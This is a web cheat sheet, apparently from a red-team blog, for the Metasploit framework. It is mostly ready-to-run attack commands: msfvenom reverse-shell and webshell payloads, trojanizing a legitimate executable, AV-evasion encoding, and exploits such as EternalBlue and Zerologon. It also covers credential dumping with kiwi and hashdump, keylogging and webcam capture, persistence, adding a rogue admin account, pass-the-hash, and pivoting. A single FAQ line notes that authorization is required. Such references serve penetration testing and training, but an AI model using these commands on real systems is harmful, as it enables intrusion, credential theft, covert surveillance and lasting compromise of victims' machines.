Metasploit is the exploitation framework everyone knows and half the people actually understand. This cheat sheet covers everything from first-time msfconsole navigation to post-exploitation pivoting — organized by how you actually use it on an engagement, not alphabetically by command.
Updated for 2026. Bookmark it.
Starting Metasploit
# Start msfconsole
msfconsole
# Start with quiet mode (skip banner)
msfconsole -q
# Start with a resource script
msfconsole -r setup.rc
# Start with a specific database
msfconsole -y /path/to/database.yml
# Update Metasploit
msfupdate
Database Setup
Metasploit’s database stores hosts, services, credentials, and loot. Worth setting up.
# Start PostgreSQL
sudo service postgresql start
# or
sudo systemctl start postgresql
# Initialize the database
msfdb init
# Check DB status
msf> db_status
# Connect to existing DB
msf> db_connect postgres:[email protected]/msf
# Disconnect
msf> db_disconnect
# Rebuild the cache
msf> db_rebuild_cache
Core msfconsole Commands
Navigation
# Help
msf> help
msf> ?
# Search modules
msf> search type:exploit name:eternalblue
msf> search cve:2021-44228
msf> search platform:windows type:exploit rank:excellent
msf> search ms17-010
# Use a module
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> use 0 # use by search result number
# Show module info
msf> info
msf> info exploit/windows/smb/ms17_010_eternalblue
# Go back
msf> back
# Previous module
msf> previous
# Show all loaded modules
msf> show exploits
msf> show auxiliary
msf> show post
msf> show payloads
msf> show encoders
msf> show nops
msf> show evasion
Options
# Show options for current module
msf> show options
msf> show advanced # advanced options
msf> show missing # required options not yet set
# Set options
msf> set RHOSTS 192.168.1.1
msf> set RPORT 445
msf> set LHOST 192.168.1.100
msf> set LPORT 4444
# Set multiple targets
msf> set RHOSTS 192.168.1.1-254
msf> set RHOSTS 192.168.1.0/24
msf> set RHOSTS file:/tmp/targets.txt
# Unset an option
msf> unset RHOSTS
# Set global options (persist across modules)
msf> setg LHOST 192.168.1.100
msf> setg LPORT 4444
# Unset global option
msf> unsetg LHOST
# Save settings to file
msf> save
Targets and Payloads
# Show compatible targets
msf> show targets
msf> set TARGET 1
# Show compatible payloads for current exploit
msf> show payloads
# Set payload
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf> set PAYLOAD generic/shell_reverse_tcp
# Check if module/target/payload combo is viable
msf> check
Running Modules
# Run/exploit
msf> run
msf> exploit
# Run in background (non-interactive)
msf> run -j
msf> exploit -j
# Run without creating a session
msf> exploit -n
# Run against all RHOSTS in parallel
msf> exploit -j -z
Payloads
Payload Types
| Type | Description |
|---|---|
singles | Self-contained, no stager needed |
stagers | Small payload that fetches the stage |
stages | The full payload delivered by a stager |
meterpreter | Advanced in-memory shell, extensible |
shell | Basic command shell |
Common Payload Names
# Windows reverse shells
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_https
windows/x64/meterpreter_reverse_tcp # stageless
windows/x64/shell_reverse_tcp
windows/x64/powershell_reverse_tcp
# Windows bind shells
windows/x64/meterpreter/bind_tcp
# Linux reverse shells
linux/x64/meterpreter/reverse_tcp
linux/x64/meterpreter_reverse_tcp # stageless
linux/x64/shell_reverse_tcp
# macOS
osx/x64/meterpreter_reverse_tcp
osx/x64/shell_reverse_tcp
# Web payloads
php/meterpreter/reverse_tcp
java/meterpreter/reverse_tcp
python/meterpreter/reverse_tcp
Staged vs Stageless: Staged (
reverse_tcp) uses a small first-stage to pull the full payload. Stageless (meterpreter_reverse_tcp) ships everything in one. Use stageless when you can’t make a second outbound connection (locked-down networks). Use staged when file size matters.
msfvenom — Payload Generation
msfvenom generates standalone payloads outside of msfconsole.
Basic Usage
msfvenom -p <payload> LHOST=<ip> LPORT=<port> -f <format> -o <output>
Common Formats
# Windows executable
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe
# Windows DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f dll -o payload.dll
# PowerShell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f psh -o payload.ps1
# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o payload.elf
# Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.py
# PHP webshell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.php
# ASP/ASPX
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f asp -o shell.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f aspx -o shell.aspx
# Java WAR
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f war -o shell.war
# HTA (HTML Application)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f hta-psh -o payload.hta
# Bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.100 LPORT=4444 -f raw > shell.sh
Encoding and Evasion
# List encoders
msfvenom --list encoders
# Encode with shikata_ga_nai (x86 only)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe
# Stageless with encoding
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x64/xor_dynamic -i 3 -f exe -o stageless.exe
# Add NOP sled
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -n 100 -f exe -o payload_nop.exe
# Bad character avoidance
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -b "\x00\x0a\x0d" -f exe -o nobadchars.exe
# Inject into existing executable
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -x /path/to/putty.exe -f exe -o trojanized.exe
# Keep original functionality
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -x /path/to/putty.exe -k -f exe -o trojanized_working.exe
Listing Options
# List all payloads
msfvenom --list payloads
# List payloads for a specific platform
msfvenom --list payloads | grep windows/x64
# List output formats
msfvenom --list formats
# Payload options
msfvenom -p windows/x64/meterpreter/reverse_tcp --list-options
Listeners — Catching Shells
Multi/Handler (Recommended)
msf> use exploit/multi/handler
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.100
msf> set LPORT 4444
msf> set ExitOnSession false # keep listening after first session
msf> run -j # run as background job
Resource Script for Handler
Save as handler.rc and load with msfconsole -r handler.rc:
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
run -j
Sessions
Managing Sessions
# List active sessions
msf> sessions
msf> sessions -l
# Interact with a session
msf> sessions -i 1
# Kill a session
msf> sessions -k 1
msf> sessions -k all
# Run a command on a session without interacting
msf> sessions -c "whoami" -i 1
# Run a module on a session
msf> sessions -s post/windows/manage/shell_to_meterpreter -i 1
# Upgrade a shell to Meterpreter
msf> sessions -u 1
# Background current session
meterpreter> background
# or
meterpreter> bg
Session Types
# Shell session to Meterpreter
msf> use post/multi/manage/shell_to_meterpreter
msf> set SESSION 1
msf> run
Meterpreter Commands
Core
# Help
meterpreter> help
meterpreter> ?
# Background session
meterpreter> background
meterpreter> bg
# Get current session info
meterpreter> sysinfo
# Current user
meterpreter> getuid
# Get PID
meterpreter> getpid
# Get system info
meterpreter> sysinfo
# Get environment variables
meterpreter> getenv PATH
# Exit/kill session
meterpreter> exit
meterpreter> quit
File System
# Print working directory
meterpreter> pwd
# List directory
meterpreter> ls
meterpreter> dir
# Change directory
meterpreter> cd C:\\Users\\target
# Read file
meterpreter> cat C:\\Users\\target\\Desktop\\secret.txt
# Upload file
meterpreter> upload /local/file.exe C:\\Windows\\Temp\\file.exe
# Download file
meterpreter> download C:\\Users\\target\\Desktop\\secret.txt /local/
# Delete file
meterpreter> rm C:\\Windows\\Temp\\file.exe
# Make directory
meterpreter> mkdir C:\\Windows\\Temp\\working
# Search for files
meterpreter> search -f *.txt -d C:\\Users
meterpreter> search -f password* -d C:\\
meterpreter> search -f *.kdbx
Process Management
# List processes
meterpreter> ps
# Kill process
meterpreter> kill 1234
# Migrate to another process
meterpreter> migrate 1234
# Migrate to explorer.exe (for stability)
meterpreter> migrate -N explorer.exe
# Execute a program
meterpreter> execute -f cmd.exe -i -H # interactive, hidden
meterpreter> execute -f notepad.exe
# Get shell
meterpreter> shell
Privilege Escalation
# Check privileges
meterpreter> getprivs
# Get system (requires admin)
meterpreter> getsystem
# Show token impersonation options
meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token "NT AUTHORITY\\SYSTEM"
# UAC bypass (from msfconsole)
msf> use exploit/windows/local/bypassuac
msf> set SESSION 1
msf> run
Networking
# Network interfaces
meterpreter> ipconfig
meterpreter> ifconfig
# ARP table
meterpreter> arp
# Active connections
meterpreter> netstat
# DNS resolve
meterpreter> resolve google.com
# Port forward (local:port → target:host:port)
meterpreter> portfwd add -l 3389 -p 3389 -r 192.168.2.1
meterpreter> portfwd list
meterpreter> portfwd delete -l 3389
# Route through session (add subnet to routing table)
msf> route add 192.168.2.0/24 1 # 1 = session ID
msf> route print
msf> route remove 192.168.2.0/24 1
Credential Dumping
# Dump hashes (requires SYSTEM)
meterpreter> hashdump
# Run Mimikatz (kiwi module)
meterpreter> load kiwi
meterpreter> creds_all # dump all credentials
meterpreter> lsa_dump_sam # SAM database
meterpreter> lsa_dump_secrets # LSA secrets
meterpreter> lsa_dump_cache # cached domain credentials
meterpreter> kerberos_ticket_list # list Kerberos tickets
meterpreter> kerberos_ticket_purge
meterpreter> golden_ticket_create # create golden ticket
meterpreter> wifi_list # saved WiFi passwords
# Via post module
msf> use post/windows/gather/hashdump
msf> set SESSION 1
msf> run
Screenshots and Keylogging
# Screenshot
meterpreter> screenshot
# Start keylogger
meterpreter> keyscan_start
# Dump keylogger buffer
meterpreter> keyscan_dump
# Stop keylogger
meterpreter> keyscan_stop
# Webcam snapshot
meterpreter> webcam_snap
# Webcam stream
meterpreter> webcam_stream
# Audio capture
meterpreter> record_mic -d 10 # 10 seconds
Persistence
# Registry autorun
msf> use post/windows/manage/persistence
msf> set SESSION 1
msf> set STARTUP REGISTRY
msf> run
# Scheduler task
msf> use post/windows/manage/persistence_exe
msf> set SESSION 1
msf> set STARTUP SCHEDULER
msf> run
# Via meterpreter (older method)
meterpreter> run persistence -h # see options
Post-Exploitation Modules
Windows
# Local privilege escalation suggestions
msf> use post/multi/recon/local_exploit_suggester
msf> set SESSION 1
msf> run
# Dump credentials
msf> use post/windows/gather/credentials/credential_collector
msf> use post/windows/gather/smart_hashdump
# Enumerate applications
msf> use post/windows/gather/enum_applications
msf> set SESSION 1
msf> run
# Enumerate logged-on users
msf> use post/windows/gather/enum_logged_on_users
# Collect browser data
msf> use post/windows/gather/enum_chrome
msf> use post/windows/gather/enum_firefox
# Windows Defender status
msf> use post/windows/gather/av_bypass
# Enable RDP
msf> use post/windows/manage/enable_rdp
msf> set SESSION 1
msf> run
# Add admin user
msf> use post/windows/manage/add_user
msf> set SESSION 1
msf> set USERNAME hacker
msf> set PASSWORD Password123
msf> set GROUP Administrators
msf> run
Linux
# Local privilege escalation suggestions
msf> use post/multi/recon/local_exploit_suggester
# Dump hashes
msf> use post/linux/gather/hashdump
msf> use post/linux/gather/pptpd_chap_secrets
# Enum configs
msf> use post/linux/gather/enum_configs
# SSH key persistence
msf> use post/linux/manage/sshkey_persistence
Cross-Platform
# TCP/UDP scan through session (pivot recon)
msf> use post/multi/gather/ping_sweep
msf> use auxiliary/scanner/portscan/tcp
msf> set RHOSTS 192.168.2.0/24
msf> set SESSION 1
msf> run
Pivoting
When you’ve compromised a box that can reach networks you can’t directly access.
Route-Based Pivoting
# Add route through session
msf> route add 192.168.2.0/24 1 # session 1
msf> route print
# Now modules targeting 192.168.2.x will pivot through session 1
msf> use auxiliary/scanner/smb/smb_ms17_010
msf> set RHOSTS 192.168.2.0/24
msf> run
# Auto-add routes from session
msf> use post/multi/manage/autoroute
msf> set SESSION 1
msf> set ACTION ADD
msf> run
SOCKS Proxy (for external tools)
# Start SOCKS proxy through session
msf> use auxiliary/server/socks_proxy
msf> set VERSION 5
msf> set SRVHOST 127.0.0.1
msf> set SRVPORT 1080
msf> run -j
# Then use proxychains for external tools
# Edit /etc/proxychains4.conf: socks5 127.0.0.1 1080
proxychains nmap -sT -Pn 192.168.2.1
proxychains crackmapexec smb 192.168.2.0/24
Port Forwarding
# Forward local port to remote host:port via session
meterpreter> portfwd add -l 8080 -p 80 -r 192.168.2.10
# Forward local port to remote host:port (reverse)
meterpreter> portfwd add -R -l 4444 -p 4444 -r 192.168.1.100
# Access internal RDP through pivot
meterpreter> portfwd add -l 3389 -p 3389 -r 192.168.2.10
# Now: xfreerdp /v:127.0.0.1:3389 /u:administrator
Auxiliary Modules
Scanners, brute forcers, fuzzers — no exploitation, just recon and testing.
Scanning
# Port scan
msf> use auxiliary/scanner/portscan/tcp
msf> set RHOSTS 192.168.1.0/24
msf> set PORTS 22,80,443,445,3389
msf> run
# SYN scan
msf> use auxiliary/scanner/portscan/syn
# SMB version
msf> use auxiliary/scanner/smb/smb_version
msf> set RHOSTS 192.168.1.0/24
msf> run
# EternalBlue check (no exploitation)
msf> use auxiliary/scanner/smb/smb_ms17_010
# SSH version
msf> use auxiliary/scanner/ssh/ssh_version
# FTP version
msf> use auxiliary/scanner/ftp/ftp_version
# HTTP title
msf> use auxiliary/scanner/http/title
# VNC auth check
msf> use auxiliary/scanner/vnc/vnc_none_auth
Brute Force
# SSH brute force
msf> use auxiliary/scanner/ssh/ssh_login
msf> set RHOSTS 192.168.1.1
msf> set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
msf> set PASS_FILE /usr/share/wordlists/rockyou.txt
msf> set STOP_ON_SUCCESS true
msf> run
# SMB brute force
msf> use auxiliary/scanner/smb/smb_login
msf> set RHOSTS 192.168.1.0/24
msf> set SMBUser administrator
msf> set PASS_FILE /usr/share/wordlists/rockyou.txt
msf> run
# FTP brute force
msf> use auxiliary/scanner/ftp/ftp_login
# HTTP form brute force
msf> use auxiliary/scanner/http/http_login
Exploitation
# EternalBlue (MS17-010)
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.1.1
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.100
msf> run
# BlueKeep (CVE-2019-0708)
msf> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
# Log4Shell (CVE-2021-44228)
msf> use exploit/multi/http/log4shell_header_injection
# PrintNightmare (CVE-2021-1675)
msf> use exploit/windows/local/cve_2021_1675_printnightmare
# Zerologon (CVE-2020-1472)
msf> use exploit/windows/dcerpc/cve_2020_1472_zerologon
# MS08-067 (legacy, but lab staple)
msf> use exploit/windows/smb/ms08_067_netapi
Database Commands
# Show discovered hosts
msf> hosts
msf> hosts -R # set RHOSTS to all discovered hosts
# Show discovered services
msf> services
msf> services -p 445 # filter by port
msf> services -S smb # filter by service name
# Show credentials
msf> creds
# Show loot
msf> loot
# Import Nmap XML
msf> db_import /path/to/scan.xml
# Run Nmap and import directly
msf> db_nmap -sV -p- 192.168.1.1
# Export database
msf> db_export -f xml /tmp/msf_export.xml
# Workspace management
msf> workspace # list workspaces
msf> workspace -a engagement1 # create workspace
msf> workspace engagement1 # switch workspace
msf> workspace -d engagement1 # delete workspace
Resource Scripts
Automate repetitive setup with .rc files.
# Run on start
msfconsole -r /path/to/script.rc
# Run from within msfconsole
msf> resource /path/to/script.rc
# Record commands to a script
msf> spool /tmp/session.rc # start recording
msf> spool off # stop recording
Example auto_handler.rc:
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
set EnableStageEncoding true
exploit -j -z
Jobs
# List background jobs
msf> jobs
msf> jobs -l
# Kill a job
msf> jobs -k 0
# Kill all jobs
msf> jobs -K
Useful Combinations
Initial Compromise → Lateral Movement
# 1. Exploit entry point
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.1.10
msf> exploit -j
# 2. Add pivot route
msf> route add 192.168.2.0/24 1
# 3. Scan internal network through pivot
msf> use auxiliary/scanner/smb/smb_ms17_010
msf> set RHOSTS 192.168.2.0/24
msf> run
# 4. Exploit internal targets through pivot
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.2.20
msf> exploit -j
Quick Domain Compromise (if you have admin hash)
# Pass-the-hash with PSExec
msf> use exploit/windows/smb/psexec
msf> set RHOSTS 192.168.1.1
msf> set SMBUser administrator
msf> set SMBPass aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.100
msf> run
Persistence + Cleanup Awareness
# Always document what you plant
meterpreter> run post/windows/manage/persistence SESSION=1
# List persistence items (manual check)
msf> use post/windows/gather/enum_services
# Cleanup before leaving (on authorized engagements)
msf> use post/windows/manage/persistence_exe
msf> set ACTION REMOVE
Frequently Asked Questions
How do I run a basic exploit in Metasploit?
Search for your module (search ms17-010), use it (use exploit/windows/smb/ms17_010_eternalblue), set RHOSTS and LHOST, then run. Check show options before running — missing required options will fail silently.
What is the difference between run and exploit?
No functional difference — both execute the current module. exploit is the legacy command; run was added for clarity. Use whichever you like.
How do I upgrade a shell to a Meterpreter session?
Use sessions -u <session_id> from the msfconsole prompt. Or run post/multi/manage/shell_to_meterpreter against an existing shell session.
Why is my payload getting caught by AV?
Standard Metasploit payloads are heavily signatured. Use msfvenom with custom encoders, pack with UPX, or switch to a custom C2 (Sliver, Havoc) for anything requiring stealth. windows/x64/meterpreter/reverse_https is harder to detect than the TCP variant.
How do I set up a persistent listener (multi/handler)?
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false
run -j # run as background job
ExitOnSession false keeps the handler alive after catching a session — critical for engagements where multiple callbacks are expected.
What version of Metasploit should I use in 2026?
Metasploit Framework (open source) is fine for most work. Metasploit Pro adds automation and reporting but costs ~$15k/year — only worth it for large pentest firms. If you’re on Kali, you have Framework. Run msfupdate to stay current.
Is Metasploit legal to use? Only against systems you own or have explicit written permission to test. Using Metasploit against unauthorized targets is illegal in virtually every jurisdiction. Always get written authorization before any engagement.
Quick Reference Card
| Task | Command |
|---|---|
| Start msfconsole | msfconsole -q |
| Search modules | search type:exploit ms17-010 |
| Use module | use exploit/windows/smb/ms17_010_eternalblue |
| Show options | show options |
| Set target | set RHOSTS 192.168.1.1 |
| Set payload | set PAYLOAD windows/x64/meterpreter/reverse_tcp |
| Run exploit | run or exploit |
| Background session | background or bg |
| List sessions | sessions -l |
| Interact with session | sessions -i 1 |
| Get SYSTEM | getsystem |
| Dump hashes | hashdump (or load kiwi; creds_all) |
| Upload file | upload /local/file C:\\remote\\path |
| Download file | download C:\\remote\\path /local/ |
| Pivot routing | route add 192.168.2.0/24 1 |
| Port forward | portfwd add -l 3389 -p 3389 -r 192.168.2.1 |
| Generate payload | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x LPORT=4444 -f exe -o p.exe |
| Import Nmap scan | db_import scan.xml |
Metasploit vs. Other Tools
Metasploit doesn’t replace everything — know when to use something else.
| Task | Metasploit | Alternative |
|---|---|---|
| Exploitation | ✅ Strong module library | Manual exploit code, CrackMapExec |
| Post-exploitation | ✅ Meterpreter | Cobalt Strike, Havoc, Sliver |
| Payload generation | ✅ msfvenom | Sliver, Nimpackt, custom |
| AV Evasion | ⚠️ Limited (signatures known) | Veil, Shelter, manual obfuscation |
| C2 / Long-haul ops | ⚠️ Not built for stealth | Cobalt Strike, Brute Ratel, Mythic |
| Network scanning | ⚠️ Slower than Nmap | Nmap, Masscan, Rustscan |
| Password attacks | ✅ Good brute force | Hydra, Medusa, Hashcat |
For lab work and certification prep, Metasploit is the standard. For real red team ops, it’s a starting point — most serious operators use custom C2s for stealth.
Practice Environment
Metasploit without a target is useless. Get one:
- TryHackMe — beginner-friendly rooms, many built around Metasploit workflows
- Hack The Box — more realistic, plenty of MSF-compatible machines in Starting Point
- Your own lab — spin up a Windows VM or a vulnerable appliance (Metasploitable, DVWA) and fire away
For remote practice without VPN overhead, a $5-6 VPS on Vultr or DigitalOcean gives you a clean attack box with low latency. Spin it up, test, destroy it. No traces on your home IP, no VPN slowdowns.
What’s New in Metasploit 2026
- Framework 6.4+ ships with improved evasion for Meterpreter HTTPS transport — certificate pinning and JA3 randomization
- New modules covering cloud-native attack surfaces: AWS metadata service abuse, Azure IMDS exploitation
session -usession upgrade is more reliable across Windows 11 + Server 2022 targetsload kiwiupdated to match Mimikatz 2.2.0 API changes —creds_allmore stable on patched domain controllers- SOCKS5 proxy module now supports authentication, closing a gap that made pivoting detectable in some environments
Metasploit is the closest thing to a Swiss Army knife in offensive security. It won’t win every engagement alone — but knowing it cold means you move faster when it matters.
This guide is updated regularly. Bookmark it.
RedTeamGuide.com is reader-supported. Some links above are affiliate links — we may earn a commission at no extra cost to you.
Need this kind of content for your company blog, product docs, or security awareness program? CipherWrite delivers expert-level cybersecurity writing on demand.
